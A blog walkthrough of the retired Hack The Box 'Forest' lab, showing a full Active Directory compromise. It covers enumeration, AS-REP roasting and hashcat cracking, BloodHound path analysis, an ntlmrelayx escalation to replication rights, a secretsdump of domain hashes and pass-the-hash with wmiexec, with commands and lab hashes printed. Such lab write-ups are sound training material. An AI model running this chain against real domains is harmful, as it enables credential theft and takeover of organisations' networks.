Hackthebox.eu - Retired - Forrest
Recon
As always I start with a simple up/down scan on all TCP ports to see what we can find.
nmap -T4 -p- -oX /root/Desktop/HTB/Forest/nmapb.xml
Then I convert that to HTML to make it pretty :)
xsltproc /root/Desktop/HTB/Forest/nmapb.xml -o /root/Desktop/HTB/Forest/nmapb.html
That's a whole lot of open ports.
Now let's do the next part of our staged scan. I'm going to scan just those ports with the -A switch to finger os/services
nmap -T4 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49698,49717 -oX ./nmapf.xml -A 10.10.10.161
Then convert that to HTML too
xsltproc /root/Desktop/HTB/Forest/nmapf.xml -o /root/Desktop/HTB/Forest/nmapf.html
Looks like we got a windows machine with AD services, winrm, dns
Let's poke around and see what we see, I added forest.htb to my hosts file here too.
Let's start with smb
Anonymous login worked but no shares available to it.
Ok can we get any info for rpc, I like to walk through this blog when doing this to refresh the commands
# rpcclient -U "" -N 10.10.10.161
Some service accounts and some named users
What about groups?
Let's check what the password policy is
We will use santi's user account for this
$> getusrdompwinfo 0x480
No complexity and at least 7 characters..
Ok let's let enum4linux do some of the grunt work on this for us
Enum4linux -a forest.htb
We got some more info about the password policy from Enum4Linux
The most interesting thing to me right now is that the lockout threshold is none… so the account won't lock out if we try to brute force the passwords.
We found some more info about the users too
So the accounts we will probably focus on are andy,mark,santi,sebastien and svc-alfresco
The svc-alfresco is especially interesting right now.
Here is some info on group memberships
So we can see svc-alfresco is a member of "Service Accounts" which is nested in "Privileged IT Accounts" so svc-alfresco is a member of both of those groups
I'm going to start with that svc-alfresco account as it seems like it might be over privileged on this machine.
Exploit
Ok we have a list of users but no passwords…. Let's try and rectify that.
ASREPRoast - This is an attack against kerberos that targets accounts that don't require preauthentication. So hopefully we get a TGT back that we can use to break the hash and get the password
I created a file called forestusers.txt on my computer and put in all the usernames we found earlier in our enumeration.
We can feed this into an impacket tool called GetNPUsers.py which if any of the users are setup to not use pre-authentication we should get a ticket back. Those tickets should be saved locally to a file.
# python GetNPUsers.py htb/ -usersfile /root/Desktop/HTB/Forest/forestusers.txt -format hashcat -outputfile /root/Desktop/HTB/Forest/hashes -dc-ip 10.10.10.161
The output here is a little misleading. It only shows users the users that have preauth set and not those that didn't. But if we check our output file …...
We did capture a ticket for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:7f8610f480ea7b9156f4b5a27d259664$6ec39f9e2f8cdbed648caffafc38c6c784ca825a48f6b5112f6dd86689daa7eb45d8f5eb06b93d4f0cf2c42f2b8448bc3f434eecb2296f7866a783302ef30be8874089435e5701eb860221efe5f043c75308b946370c7675da35629368f9b2c9ae33c7ba5c1ce4c8e2c9e49ada72ea2fa41c16706f5fe97e7154a3ddf83d4a5efb8e8410edf0a3784bb9356b60b9a650c617c3355aac87e00690f5515512958e135c264c4bc635aca826ac744739fef58661da1f96db684c2a9d05c93b972ebdbc80a3b21fb01c72640abe85b7f3416211347f95283d35be03f855b90bb9373b
Now we can take our output and throw it in hashcat to break the hash
# hashcat -m 18200 -a 0 /root/Desktop/HTB/Forest/hashes /usr/share/wordlists/rockyou.txt --force
Here we see the password was found in rockyou.txt
s3rvice
Let's see if we can connect up to that smb now
# smbclient -L forest.htb -U HTB\\svc-alfresco
Sure can so we know our creds are good :)
Let's use winrm to connect up to the box
# ruby rubywinRM
Cool, we are in…. Lets get that user.txt hash
PS > type user.txt
e5e***************************
What about priv escalation?
Have you heard of bloodhound?
It's a tool for analyzing AD environments, which can show all sorts of relationships that would take ages to suss out.
We are going to use it to take a look at the setup here
You can install it from the git repo
I'm also going to use bloodhound-python and bloodhoud-import ( also on github)
The first bloodbound.python is a tool we can use to get the AD data out of a remote machine
The second bloodhound-import is a way to import that into our bloodhound-DB
First let's scan the environment with bloodhound-python
# bloodhound-python -d htb.local -u svc-alfresco -p s3rvice -gc forest.htb -c all -ns 10.10.10.161
This creates json files for computer and user accounts as well as groups sessions and domains.
I move them all to a folder called forest on my machine
Now we will use bloodhound-import to get them into our bloodhound DB
# bloodhound-import -du circusmonkey404 -dp ********************* ./*.json
There are queries built into bloodhound one is called "shortest path to High value targets"
Our output looks like this
And this little guy way down here is our user svc-alfresco
If we click on that account we get some more info on the account.
If we choose the "reachable high value targets"
We get this
We are a member of "Service Accounts" which we already discovered in our initial enumeration. We also saw that because of nesting we were a member of "Privileged IT accounts", but that is all we saw.
Now we can see the netsting goes further. "Privileged IT Accounts" is a member of "Account Operators" which has a connection to "Exchange windows permissions" which has write dacl to the entire domain.
Here is a nice write up about how we can leverage this to get Domain Admin privileges.
We'll follow this blog to privilege escalation.
First let's add our account to the groups mentioned in the posts
Import-Module ActiveDirectory
Add-AdGroupMember "Exchange Windows Permissions" svc-alfresco
Now we can skip the privexchange.py part because there really is no exchange server in the lan to authenticate against.
So now we run
opt/impacket-master/examples# ./ntlmrelayx.py -t ldap://forest.htb.local --escalate-user svc-alfresco
Then pull up a web browser and hit our loopback address.
Here we are prompted to authenticate so we will use svc-alfresco and s3rvice
Checking back on ntlmreayx.py we get this
We successfully authenticated against the DC and it escalated our user to have replication rights.
So pop over to secretsdump.py
/opt/impacket-master/examples# ./secretsdump.py htb/svc-alfresco@10.10.10.161
And we get hashes!!!!!
I found on this previous step you really have to act fast. I was up against this for a couple of days before I got the sequence right.
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
Now we could spend some time cracking this hash to see what the password is or….
We can just pass the hash
Using wmiexec.py from impacket can get us were we need to be
# ./wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 administrator@10.10.10.161
And a quick whoami
We are administrator
Let's get that hash
Comments
Post a Comment